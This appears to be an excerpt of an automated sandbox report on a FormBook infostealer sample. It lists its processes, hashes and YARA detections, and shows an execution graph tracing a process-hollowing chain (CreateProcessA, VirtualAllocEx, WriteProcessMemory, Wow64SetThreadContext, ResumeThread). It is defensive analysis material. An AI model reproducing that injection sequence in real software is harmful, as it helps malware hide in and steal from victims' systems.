                                              Path:C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe"
                                              Imagebase:0x8d0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              General

                                              Target ID:17
                                              Start time:23:21:31
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\regini.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\regini.exe"
                                              Imagebase:0x8c0000
                                              File size:41'472 bytes
                                              MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              General

                                              Target ID:20
                                              Start time:23:21:43
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe"
                                              Imagebase:0x8d0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              General

                                              Target ID:22
                                              Start time:23:21:57
                                              Start date:10/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6d20e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:178
                                                Total number of Limit Nodes:11
                                                execution_graph 25319 243d6c0 DuplicateHandle 25320 243d756 25319->25320 25525 243acf0 25526 243acff 25525->25526 25529 243add8 25525->25529 25534 243ade8 25525->25534 25530 243ae1c 25529->25530 25531 243adf9 25529->25531 25530->25526 25531->25530 25532 243b020 GetModuleHandleW 25531->25532 25533 243b04d 25532->25533 25533->25526 25535 243ae1c 25534->25535 25536 243adf9 25534->25536 25535->25526 25536->25535 25537 243b020 GetModuleHandleW 25536->25537 25538 243b04d 25537->25538 25538->25526 25321 6a4f600 25322 6a4f78b 25321->25322 25323 6a4f626 25321->25323 25323->25322 25325 6a4b660 25323->25325 25326 6a4f880 PostMessageW 25325->25326 25327 6a4f8ec 25326->25327 25327->25323 25328 6a4c181 25329 6a4c267 25328->25329 25330 6a4c18b 25328->25330 25334 6a4e526 25330->25334 25352 6a4e4c0 25330->25352 25369 6a4e4b0 25330->25369 25335 6a4e4b4 25334->25335 25337 6a4e529 25334->25337 25386 6a4e948 25335->25386 25391 6a4ee43 25335->25391 25396 6a4e8e2 25335->25396 25401 6a4ed21 25335->25401 25406 6a4eee1 25335->25406 25414 6a4efc7 25335->25414 25418 6a4ec67 25335->25418 25422 6a4ef79 25335->25422 25426 6a4ecbf 25335->25426 25430 6a4eb1d 25335->25430 25435 6a4f0fd 25335->25435 25440 6a4ea7d 25335->25440 25445 6a4ea11 25335->25445 25451 6a4eb70 25335->25451 25336 6a4e4e2 25336->25329 25337->25329 25353 6a4e4da 25352->25353 25355 6a4ec67 2 API calls 25353->25355 25356 6a4efc7 2 API calls 25353->25356 25357 6a4eee1 4 API calls 25353->25357 25358 6a4ed21 2 API calls 25353->25358 25359 6a4e8e2 2 API calls 25353->25359 25360 6a4ee43 2 API calls 25353->25360 25361 6a4e948 2 API calls 25353->25361 25362 6a4eb70 2 API calls 25353->25362 25363 6a4ea11 2 API calls 25353->25363 25364 6a4ea7d 2 API calls 25353->25364 25365 6a4f0fd 2 API calls 25353->25365 25366 6a4eb1d 2 API calls 25353->25366 25367 6a4ecbf 2 API calls 25353->25367 25368 6a4ef79 2 API calls 25353->25368 25354 6a4e4e2 25354->25329 25355->25354 25356->25354 25357->25354 25358->25354 25359->25354 25360->25354 25361->25354 25362->25354 25363->25354 25364->25354 25365->25354 25366->25354 25367->25354 25368->25354 25370 6a4e4b4 25369->25370 25372 6a4ec67 2 API calls 25370->25372 25373 6a4efc7 2 API calls 25370->25373 25374 6a4eee1 4 API calls 25370->25374 25375 6a4ed21 2 API calls 25370->25375 25376 6a4e8e2 2 API calls 25370->25376 25377 6a4ee43 2 API calls 25370->25377 25378 6a4e948 2 API calls 25370->25378 25379 6a4eb70 2 API calls 25370->25379 25380 6a4ea11 2 API calls 25370->25380 25381 6a4ea7d 2 API calls 25370->25381 25382 6a4f0fd 2 API calls 25370->25382 25383 6a4eb1d 2 API calls 25370->25383 25384 6a4ecbf 2 API calls 25370->25384 25385 6a4ef79 2 API calls 25370->25385 25371 6a4e4e2 25371->25329 25372->25371 25373->25371 25374->25371 25375->25371 25376->25371 25377->25371 25378->25371 25379->25371 25380->25371 25381->25371 25382->25371 25383->25371 25384->25371 25385->25371 25388 6a4e8e5 25386->25388 25456 6a4bb24 25388->25456 25460 6a4bb30 25388->25460 25392 6a4ee47 25391->25392 25464 6a4aed0 25392->25464 25468 6a4aed8 25392->25468 25393 6a4ee62 25393->25336 25397 6a4e8ef 25396->25397 25399 6a4bb24 CreateProcessA 25397->25399 25400 6a4bb30 CreateProcessA 25397->25400 25398 6a4e9cc 25399->25398 25400->25398 25402 6a4ed27 25401->25402 25472 6a4b990 25402->25472 25476 6a4b998 25402->25476 25403 6a4ed4a 25403->25336 25407 6a4ee47 25406->25407 25408 6a4eb24 25406->25408 25412 6a4aed0 Wow64SetThreadContext 25407->25412 25413 6a4aed8 Wow64SetThreadContext 25407->25413 25480 6a4ae20 25408->25480 25484 6a4ae28 25408->25484 25409 6a4ee62 25409->25336 25412->25409 25413->25409 25488 6a4b4a0 25414->25488 25492 6a4b4a8 25414->25492 25415 6a4eff5 25496 6a4b3e0 25418->25496 25500 6a4b3e8 25418->25500 25419 6a4ec85 25424 6a4b4a0 WriteProcessMemory 25422->25424 25425 6a4b4a8 WriteProcessMemory 25422->25425 25423 6a4ef9d 25424->25423 25425->25423 25428 6a4aed0 Wow64SetThreadContext 25426->25428 25429 6a4aed8 Wow64SetThreadContext 25426->25429 25427 6a4ecd9 25428->25427 25429->25427 25431 6a4eb23 25430->25431 25433 6a4ae20 ResumeThread 25431->25433 25434 6a4ae28 ResumeThread 25431->25434 25432 6a4ef20 25432->25336 25433->25432 25434->25432 25436 6a4f103 25435->25436 25438 6a4b4a0 WriteProcessMemory 25436->25438 25439 6a4b4a8 WriteProcessMemory 25436->25439 25437 6a4f317 25438->25437 25439->25437 25441 6a4f112 25440->25441 25443 6a4b4a0 WriteProcessMemory 25441->25443 25444 6a4b4a8 WriteProcessMemory 25441->25444 25442 6a4f317 25443->25442 25444->25442 25446 6a4ea20 25445->25446 25447 6a4ea26 25446->25447 25449 6a4b4a0 WriteProcessMemory 25446->25449 25450 6a4b4a8 WriteProcessMemory 25446->25450 25447->25336 25448 6a4f317 25449->25448 25450->25448 25452 6a4eb24 25451->25452 25454 6a4ae20 ResumeThread 25452->25454 25455 6a4ae28 ResumeThread 25452->25455 25453 6a4ef20 25453->25336 25454->25453 25455->25453 25457 6a4bb30 CreateProcessA 25456->25457 25459 6a4bd7b 25457->25459 25461 6a4bbb9 CreateProcessA 25460->25461 25463 6a4bd7b 25461->25463 25465 6a4aed8 Wow64SetThreadContext 25464->25465 25467 6a4af65 25465->25467 25467->25393 25469 6a4af1d Wow64SetThreadContext 25468->25469 25471 6a4af65 25469->25471 25471->25393 25473 6a4b9e3 ReadProcessMemory 25472->25473 25475 6a4ba27 25473->25475 25475->25403 25477 6a4b9e3 ReadProcessMemory 25476->25477 25479 6a4ba27 25477->25479 25479->25403 25481 6a4ae28 ResumeThread 25480->25481 25483 6a4ae99 25481->25483 25483->25409 25485 6a4ae68 ResumeThread 25484->25485 25487 6a4ae99 25485->25487 25487->25409 25489 6a4b4a8 WriteProcessMemory 25488->25489 25491 6a4b547 25489->25491 25491->25415 25493 6a4b4f0 WriteProcessMemory 25492->25493 25495 6a4b547 25493->25495 25495->25415 25497 6a4b3e5 VirtualAllocEx 25496->25497 25499 6a4b465 25497->25499 25499->25419 25501 6a4b428 VirtualAllocEx 25500->25501 25503 6a4b465 25501->25503 25503->25419 25504 2434668 25505 243467a 25504->25505 25506 2434686 25505->25506 25508 2434778 25505->25508 25509 243479d 25508->25509 25513 2434878 25509->25513 25517 2434888 25509->25517 25514 24348af 25513->25514 25515 243498c 25514->25515 25521 24344b4 25514->25521 25519 24348af 25517->25519 25518 243498c 25519->25518 25520 24344b4 CreateActCtxA 25519->25520 25520->25518 25522 2435918 CreateActCtxA 25521->25522 25524 24359db 25522->25524 25539 243d478 25540 243d4be GetCurrentProcess 25539->25540 25542 243d510 GetCurrentThread 25540->25542 25543 243d509 25540->25543 25544 243d546 25542->25544 25545 243d54d GetCurrentProcess 25542->25545 25543->25542 25544->25545 25548 243d583 25545->25548 25546 243d5ab GetCurrentThreadId 25547 243d5dc 25546->25547 25548->25546

                                                Executed Functions

                                                Function 0243D468 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0243D4F6
                                                • GetCurrentThread.KERNEL32 ref: 0243D533
                                                • GetCurrentProcess.KERNEL32 ref: 0243D570
                                                • GetCurrentThreadId.KERNEL32 ref: 0243D5C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: c15f6c92942e8e7c6d36e48aba0534c7b19e85e86b28c3b0f87fec54cb334c92
                                                • Instruction ID: dfaeff2c9f50c1dabecd0d76faac85cd9f03b462d3a17cb8dea61df3ca33e405
                                                • Opcode Fuzzy Hash: c15f6c92942e8e7c6d36e48aba0534c7b19e85e86b28c3b0f87fec54cb334c92
                                                • Instruction Fuzzy Hash: 205154B0D003499FDB55DFAAD548BEEBBF1BF88314F20845AE409A7290DB356944CF29
                                                Function 0243D478 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0243D4F6
                                                • GetCurrentThread.KERNEL32 ref: 0243D533
                                                • GetCurrentProcess.KERNEL32 ref: 0243D570
                                                • GetCurrentThreadId.KERNEL32 ref: 0243D5C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 1d52dfa6fb04eb1fd7705384fc2918ce2d9fe7b03d51a4beb7f17bf6f4522e9a
                                                • Instruction ID: dd3f1a08d1c2bab433e0a6758a16567bc2e0fc64dd12ddb625982d71b573b5e1
                                                • Opcode Fuzzy Hash: 1d52dfa6fb04eb1fd7705384fc2918ce2d9fe7b03d51a4beb7f17bf6f4522e9a
                                                • Instruction Fuzzy Hash: 085133B0D013099FDB55DFAAD548BDEBBF1BF88314F20845AE409A72A0DB34A944CF65
                                                Function 06A4BB24 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 6a4bb24-6a4bbc5 47 6a4bbc7-6a4bbd1 44->47 48 6a4bbfe-6a4bc1e 44->48 47->48 49 6a4bbd3-6a4bbd5 47->49 55 6a4bc57-6a4bc86 48->55 56 6a4bc20-6a4bc2a 48->56 50 6a4bbd7-6a4bbe1 49->50 51 6a4bbf8-6a4bbfb 49->51 53 6a4bbe5-6a4bbf4 50->53 54 6a4bbe3 50->54 51->48 53->53 57 6a4bbf6 53->57 54->53 64 6a4bcbf-6a4bd79 CreateProcessA 55->64 65 6a4bc88-6a4bc92 55->65 56->55 58 6a4bc2c-6a4bc2e 56->58 57->51 60 6a4bc30-6a4bc3a 58->60 61 6a4bc51-6a4bc54 58->61 62 6a4bc3c 60->62 63 6a4bc3e-6a4bc4d 60->63 61->55 62->63 63->63 66 6a4bc4f 63->66 76 6a4bd82-6a4be08 64->76 77 6a4bd7b-6a4bd81 64->77 65->64 67 6a4bc94-6a4bc96 65->67 66->61 69 6a4bc98-6a4bca2 67->69 70 6a4bcb9-6a4bcbc 67->70 71 6a4bca4 69->71 72 6a4bca6-6a4bcb5 69->72 70->64 71->72 72->72 74 6a4bcb7 72->74 74->70 87 6a4be18-6a4be1c 76->87 88 6a4be0a-6a4be0e 76->88 77->76 90 6a4be2c-6a4be30 87->90 91 6a4be1e-6a4be22 87->91 88->87 89 6a4be10 88->89 89->87 93 6a4be40-6a4be44 90->93 94 6a4be32-6a4be36 90->94 91->90 92 6a4be24 91->92 92->90 95 6a4be56-6a4be5d 93->95 96 6a4be46-6a4be4c 93->96 94->93 97 6a4be38 94->97 98 6a4be74 95->98 99 6a4be5f-6a4be6e 95->99 96->95 97->93 101 6a4be75 98->101 99->98 101->101
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A4BD66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 03b9be3c8dad26b25447d20897d1694efd9908d5b978c812d33afde68fcbe872
                                                • Instruction ID: 55d74f115b41f0e1c703a987e3ee3b788ce0720a6c07204c2dbbe03f29c5fbc2
                                                • Opcode Fuzzy Hash: 03b9be3c8dad26b25447d20897d1694efd9908d5b978c812d33afde68fcbe872
                                                • Instruction Fuzzy Hash: 16A16D71D00219DFEB54EF69CC81BDEBBB2BF88310F1485A9D808A7240DB749985CFA1
                                                Function 06A4BB30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 102 6a4bb30-6a4bbc5 104 6a4bbc7-6a4bbd1 102->104 105 6a4bbfe-6a4bc1e 102->105 104->105 106 6a4bbd3-6a4bbd5 104->106 112 6a4bc57-6a4bc86 105->112 113 6a4bc20-6a4bc2a 105->113 107 6a4bbd7-6a4bbe1 106->107 108 6a4bbf8-6a4bbfb 106->108 110 6a4bbe5-6a4bbf4 107->110 111 6a4bbe3 107->111 108->105 110->110 114 6a4bbf6 110->114 111->110 121 6a4bcbf-6a4bd79 CreateProcessA 112->121 122 6a4bc88-6a4bc92 112->122 113->112 115 6a4bc2c-6a4bc2e 113->115 114->108 117 6a4bc30-6a4bc3a 115->117 118 6a4bc51-6a4bc54 115->118 119 6a4bc3c 117->119 120 6a4bc3e-6a4bc4d 117->120 118->112 119->120 120->120 123 6a4bc4f 120->123 133 6a4bd82-6a4be08 121->133 134 6a4bd7b-6a4bd81 121->134 122->121 124 6a4bc94-6a4bc96 122->124 123->118 126 6a4bc98-6a4bca2 124->126 127 6a4bcb9-6a4bcbc 124->127 128 6a4bca4 126->128 129 6a4bca6-6a4bcb5 126->129 127->121 128->129 129->129 131 6a4bcb7 129->131 131->127 144 6a4be18-6a4be1c 133->144 145 6a4be0a-6a4be0e 133->145 134->133 147 6a4be2c-6a4be30 144->147 148 6a4be1e-6a4be22 144->148 145->144 146 6a4be10 145->146 146->144 150 6a4be40-6a4be44 147->150 151 6a4be32-6a4be36 147->151 148->147 149 6a4be24 148->149 149->147 152 6a4be56-6a4be5d 150->152 153 6a4be46-6a4be4c 150->153 151->150 154 6a4be38 151->154 155 6a4be74 152->155 156 6a4be5f-6a4be6e 152->156 153->152 154->150 158 6a4be75 155->158 156->155 158->158
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A4BD66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: ec8d22d6069c6f2dbb3fe18f46eb53f619014404d8297d3963c2f5276fcfbe84
                                                • Instruction ID: 18729b6ef5e924613673c3069d6d7e16b9a0f8dcb28a8faaabea872342bf0113
                                                • Opcode Fuzzy Hash: ec8d22d6069c6f2dbb3fe18f46eb53f619014404d8297d3963c2f5276fcfbe84
                                                • Instruction Fuzzy Hash: 3F915C71D00219DFEB54EF69CC817EEBBB2BF88310F1485A9D808A7250DB759985CFA1
                                                Function 0243ADE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 159 243ade8-243adf7 160 243ae23-243ae27 159->160 161 243adf9-243ae06 call 2439414 159->161 163 243ae3b-243ae7c 160->163 164 243ae29-243ae33 160->164 166 243ae08 161->166 167 243ae1c 161->167 170 243ae89-243ae97 163->170 171 243ae7e-243ae86 163->171 164->163 214 243ae0e call 243b070 166->214 215 243ae0e call 243b080 166->215 167->160 172 243aebb-243aebd 170->172 173 243ae99-243ae9e 170->173 171->170 177 243aec0-243aec7 172->177 175 243aea0-243aea7 call 243a150 173->175 176 243aea9 173->176 174 243ae14-243ae16 174->167 178 243af58-243b018 174->178 180 243aeab-243aeb9 175->180 176->180 181 243aed4-243aedb 177->181 182 243aec9-243aed1 177->182 209 243b020-243b04b GetModuleHandleW 178->209 210 243b01a-243b01d 178->210 180->177 184 243aee8-243aef1 call 243a160 181->184 185 243aedd-243aee5 181->185 182->181 190 243aef3-243aefb 184->190 191 243aefe-243af03 184->191 185->184 190->191 192 243af21-243af2e 191->192 193 243af05-243af0c 191->193 200 243af51-243af57 192->200 201 243af30-243af4e 192->201 193->192 195 243af0e-243af1e call 243a170 call 243a180 193->195 195->192 201->200 211 243b054-243b068 209->211 212 243b04d-243b053 209->212 210->209 212->211 214->174 215->174
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0243B03E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2dfb0b73593674c7dc6db1ac54e8d802e07fc8a4d4651828327f976618be96f1
                                                • Instruction ID: 263ce8841351d6ee11298eda531e8a7ba1b9bf996bbc277b0c090e6b5e46b1e7
                                                • Opcode Fuzzy Hash: 2dfb0b73593674c7dc6db1ac54e8d802e07fc8a4d4651828327f976618be96f1
                                                • Instruction Fuzzy Hash: 67711070A00B158FDB25DF2AD44579ABBF1BF88214F00892ED48AD7A40DB75E849CB95
                                                Function 024344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 216 24344b4-24359d9 CreateActCtxA 219 24359e2-2435a3c 216->219 220 24359db-24359e1 216->220 227 2435a4b-2435a4f 219->227 228 2435a3e-2435a41 219->228 220->219 229 2435a51-2435a5d 227->229 230 2435a60 227->230 228->227 229->230 232 2435a61 230->232 232->232
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 024359C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f6d495166928aa123265a68068d29b28c577dba5329d458e08ce9397fa8528c5
                                                • Instruction ID: 4798ceddaa33ccba01575007123563e0f07fcd55f1b52e9945ee1730d9d841a7
                                                • Opcode Fuzzy Hash: f6d495166928aa123265a68068d29b28c577dba5329d458e08ce9397fa8528c5
                                                • Instruction Fuzzy Hash: 6341E0B0D00719CFEB25DFAAC884BCEBBB5BF48704F60806AD408AB251DB756945CF90
                                                Function 0243590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 233 243590c-2435913 234 243591c-24359d9 CreateActCtxA 233->234 236 24359e2-2435a3c 234->236 237 24359db-24359e1 234->237 244 2435a4b-2435a4f 236->244 245 2435a3e-2435a41 236->245 237->236 246 2435a51-2435a5d 244->246 247 2435a60 244->247 245->244 246->247 249 2435a61 247->249 249->249
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 024359C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 0136af51a7e0287c378ec3caaa10d870306b5f0bda7156f13036cef385161250
                                                • Instruction ID: 9fbb478b519f6151465d0ff995b02a1a8f2ebc5dd82a8322638da8fbea185b6a
                                                • Opcode Fuzzy Hash: 0136af51a7e0287c378ec3caaa10d870306b5f0bda7156f13036cef385161250
                                                • Instruction Fuzzy Hash: EE41E0B1D00719CFEB25DFAAC8847CEBBB5BF88714F20816AD408AB251DB75594ACF50
                                                Function 06A4B4A0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 250 6a4b4a0-6a4b4f6 253 6a4b506-6a4b545 WriteProcessMemory 250->253 254 6a4b4f8-6a4b504 250->254 256 6a4b547-6a4b54d 253->256 257 6a4b54e-6a4b57e 253->257 254->253 256->257
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A4B538
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 37928aca7325f3f31e7f166020e0c32e8768f70302a5dfc3bbf07f7a00f2c205
                                                • Instruction ID: 66a8e41ad82e4c81f4cc66a2e79c1917d4679126dbf4eecd4b1840edf79bdcf2
                                                • Opcode Fuzzy Hash: 37928aca7325f3f31e7f166020e0c32e8768f70302a5dfc3bbf07f7a00f2c205
                                                • Instruction Fuzzy Hash: F62148719003499FDB10DFAAC885BDEFBF5FF88310F108829E919A7241D7789941CBA1
                                                Function 06A4B4A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 272 6a4b4a8-6a4b4f6 274 6a4b506-6a4b545 WriteProcessMemory 272->274 275 6a4b4f8-6a4b504 272->275 277 6a4b547-6a4b54d 274->277 278 6a4b54e-6a4b57e 274->278 275->274 277->278
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A4B538
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 088dfa20d40be33eba883d5e5e5380c9b19bdd563502259afd98f761008284ea
                                                • Instruction ID: 8247cb10dfac035448a479882e66a1e79e1a5afdb87e3308198bec0685ce63b5
                                                • Opcode Fuzzy Hash: 088dfa20d40be33eba883d5e5e5380c9b19bdd563502259afd98f761008284ea
                                                • Instruction Fuzzy Hash: 352127719003499FDB10DFAAC881BDEBBF5FF88310F108829E919A7240D7789945CBA1
                                                Function 06A4AED0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 261 6a4aed0-6a4af23 264 6a4af25-6a4af31 261->264 265 6a4af33-6a4af63 Wow64SetThreadContext 261->265 264->265 267 6a4af65-6a4af6b 265->267 268 6a4af6c-6a4af9c 265->268 267->268
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A4AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: ed2124f58559b671952f6fcb97b8ce1977b5bb5af56eb8ff67c55df91d4a6741
                                                • Instruction ID: 64ae210e50a59dda83b8cad14216580848453e0fafb7ad7c0e5508d5a5a8838e
                                                • Opcode Fuzzy Hash: ed2124f58559b671952f6fcb97b8ce1977b5bb5af56eb8ff67c55df91d4a6741
                                                • Instruction Fuzzy Hash: FE215971D003099FDB10DFAAC885BEEBBF4EF88224F548429E559A7241CB789545CFA0
                                                Function 06A4B990 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 282 6a4b990-6a4ba25 ReadProcessMemory 285 6a4ba27-6a4ba2d 282->285 286 6a4ba2e-6a4ba5e 282->286 285->286
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A4BA18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 6578a44cd31db1d0235f53a1b3a290448c0fdc388bd8f78b20af1f19307c97f1
                                                • Instruction ID: 591c72568b4a9ccfa7c478640d61cdd8d374cc61e9e359641914819f2237ad96
                                                • Opcode Fuzzy Hash: 6578a44cd31db1d0235f53a1b3a290448c0fdc388bd8f78b20af1f19307c97f1
                                                • Instruction Fuzzy Hash: 572128718003499FDB10DFAAC881BEEFBF5FF88310F508829E518A7240C7799941DBA0
                                                Function 0243D6B9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule

